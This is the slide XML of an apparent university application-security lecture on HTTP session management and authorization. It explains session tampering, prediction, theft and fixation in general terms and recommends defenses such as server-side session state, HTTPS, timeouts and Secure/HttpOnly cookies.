                <a:srgbClr val="000000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474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is stateless</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each request/response cycle is independent of the previous and subsequent cycles.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Carry over from the days of the static web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ways of preserving state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hidden fields in forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>URL rewriting/encoding of state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Local storage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300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is stateless</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each request/response cycle is independent of the previous and subsequent cycles.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Carry over from the days of the static web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ways of preserving state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hidden fields in forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>URL rewriting/encoding of state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Local storage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105400" y="3124200"/>
            <a:ext cx="3683000" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -79822"/>
              <a:gd name="adj2" fmla="val 2512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But state kept in the client is untrustworthy.  How can we use it?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010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19199"/>
            <a:ext cx="4924425" cy="4694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381000" y="2169540"/>
            <a:ext cx="2743200" cy="2021459"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 93242"/>
              <a:gd name="adj2" fmla="val -4159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Can we just encode session state and keep it in a cookie?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336268"/>
            <a:ext cx="6418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: http://cscie12.dce.harvard.edu/lecture_notes/2011/20110504/handout.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29305848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066800"/>
            <a:ext cx="5962650" cy="476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228600" y="1410617"/>
            <a:ext cx="2743200" cy="4078860"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 94252"/>
              <a:gd name="adj2" fmla="val -1849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No, but we can use a cookie as an index to look up session state on the server.  Stealing this cookie is the same as stealing usernames and passwords.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336268"/>
            <a:ext cx="6418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: http://cscie12.dce.harvard.edu/lecture_notes/2011/20110504/handout.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2294446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066800"/>
            <a:ext cx="5962650" cy="476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228600" y="1410617"/>
            <a:ext cx="2743200" cy="4078860"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 94252"/>
              <a:gd name="adj2" fmla="val -1849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No, but we can use a cookie as an index to look up session state on the server.  Stealing this cookie is the same as stealing usernames and passwords.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336268"/>
            <a:ext cx="6418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: http://cscie12.dce.harvard.edu/lecture_notes/2011/20110504/handout.html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724400" y="3886200"/>
            <a:ext cx="2971800" cy="1408783"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -56797"/>
              <a:gd name="adj2" fmla="val -9913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These network connections had better be encrypted!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3817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Attacks against sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tampering: modifying cookies (usually plaintext) to escalate privilege or guess other session IDs.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>The user ID is not a good session ID!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Predicting: knowing the algorithm used to generate session IDs, predict next user’s ID.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Theft: stealing session IDs using XSS or sniffing unencrypted communications (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>FireSheep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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172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Attacks against sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session fixation: attacker visits a site (without authenticating) and gets a session ID, then records that ID and leaves the site and the computer.  Another user visits the same site and logs in, but the site doesn’t issue a new session ID.  Now the attacker can impersonate the second person.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840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Never keep session state on the client. Ever.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unguessable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, opaque, session ID as a cookie (not in forms or in URLs). Use this as an index to server-based session state.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encrypt the connections with HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Enforce absolute session timeouts. 4 hours? 8 hours? Limit the window for stealing IDs.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3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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, authorization, and accounting make up the “AAA” services in security.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Definition: “the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of determining whether a subject has sufficient permission to perform a given operation against a target resource,” (Sullivan &amp; Liu, p. 93).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770582" y="1676400"/>
            <a:ext cx="2895600" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -73149"/>
              <a:gd name="adj2" fmla="val 7270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Action verb, series of steps to perform.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3170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Enforce idle session timeouts: 20 to 30 minutes of idle time.  Need not destroy per-user state, but does force re-authentication. Warning: annoys users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Limiting concurrency: how many concurrent logins per user are permitted?  Can the user invalidate other logins?  Google does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959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Enforce idle session timeouts: 20 to 30 minutes of idle time.  Need not destroy per-user state, but does force re-authentication. Warning: annoys users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Limiting concurrency: how many concurrent logins per user are permitted?  Can the user invalidate other logins?  Google does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51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1047750"/>
            <a:ext cx="4371975" cy="476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8907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Use secure cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>only accessible by HTTP (not JavaScript)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0"/>
            <a:ext cx="8153400" cy="6096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Set-Cookie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SessionId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=YSBtYW4gYSBwbGFuIGEg; Secure;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HttpOnly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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286000" y="4191000"/>
            <a:ext cx="5410200" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -42115"/>
              <a:gd name="adj2" fmla="val -9544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Cookie will only be sent over HTTPS (mitigates sniffing) and will be inaccessible to JavaScript (mitigates XSS).  Helps honest users.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583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Places to destroy session IDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On the server.  The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>must</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> destroy place.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> entry to sweep every X minutes, or framework-specific method.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies on the browser: set the same cookie, but with an expiration date in the past.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On browser close: set cookie expire to zero.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encrypted cookies: possible, but not recommended (who wants to manage keys?)  Servers have lots of storage to keep state there.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57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Prominent logout function: logouts destroy the session IDs everywhere. Let your users do it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Regenerate session ID on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reauthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>prevents session fixation.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398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95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</a:p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4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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, authorization, and accounting make up the “AAA” services in security.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Definition: “the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of determining whether a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> has sufficient permission to perform a given operation against a target resource,” (Sullivan &amp; Liu, p. 93).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1752600"/>
            <a:ext cx="2590800" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8641"/>
              <a:gd name="adj2" fmla="val 11166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Person, program, service, etc.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770582" y="1676400"/>
            <a:ext cx="2895600" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -73149"/>
              <a:gd name="adj2" fmla="val 7270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Action verb, series of steps to perform.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36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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, authorization, and accounting make up the “AAA” services in security.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Definition: “the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of determining whether a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> has sufficient </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>permission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to perform a given operation against a target resource,” (Sullivan &amp; Liu, p. 93).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4724400"/>
            <a:ext cx="3200400" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 66548"/>
              <a:gd name="adj2" fmla="val -10844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Access matrix, ACL, CL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Biba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Clark-Wilson, Bell-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LaPadula</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, DAC, MAC, RBAC, etc.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85800" y="1752600"/>
            <a:ext cx="2590800" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8641"/>
              <a:gd name="adj2" fmla="val 11166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Person, program, service, etc.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770582" y="1676400"/>
            <a:ext cx="2895600" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -73149"/>
              <a:gd name="adj2" fmla="val 7270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Action verb, series of steps to perform.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69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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, authorization, and accounting make up the “AAA” services in security.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Definition: “the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty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of determining whether a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> has sufficient </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>permission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to perform a given operation against a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> resource,” (Sullivan &amp; Liu, p. 93).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4724400"/>
            <a:ext cx="3200400" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 66548"/>
              <a:gd name="adj2" fmla="val -10844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Access matrix, ACL, CL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Biba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Clark-Wilson, Bell-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LaPadula</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, DAC, MAC, RBAC, etc.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410200" y="4927600"/>
            <a:ext cx="3200400" cy="1346200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -46006"/>
              <a:gd name="adj2" fmla="val -11020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Object: URL, file, process, service, server, directory, etc.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85800" y="1752600"/>
            <a:ext cx="2590800" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8641"/>
              <a:gd name="adj2" fmla="val 11166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Person, program, service, etc.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770582" y="1676400"/>
            <a:ext cx="2895600" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -73149"/>
              <a:gd name="adj2" fmla="val 7270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Action verb, series of steps to perform.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0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“process” is a policy in action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This ties back to the overall organizational security plan as well as the security requirements for the application.  All need to be in harmony.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92589"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Todd's Franklin Template">
  <a:themeElements>
    <a:clrScheme name="Franklin University">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="133C5D"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="EEECE1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="4F749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Todd's Franklin Template</Template>
  <TotalTime>3556</TotalTime>
  <Words>2748</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>365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Todd's Franklin Template</vt:lpstr>
      <vt:lpstr>ISEC 400 Application Security Week 6</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Outcomes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Authorization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Session Management</vt:lpstr>
      <vt:lpstr>Upcoming deadlines</vt:lpstr>
      <vt:lpstr>Question &amp; answer</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Franklin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Course</dc:title>
  <dc:creator>Todd Whittaker</dc:creator>
  <cp:lastModifiedBy>Todd Whittaker</cp:lastModifiedBy>
  <cp:revision>88</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-09-23T19:29:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-10-22T21:41:45Z</dcterms:modified>
</cp:coreProperties>
</file>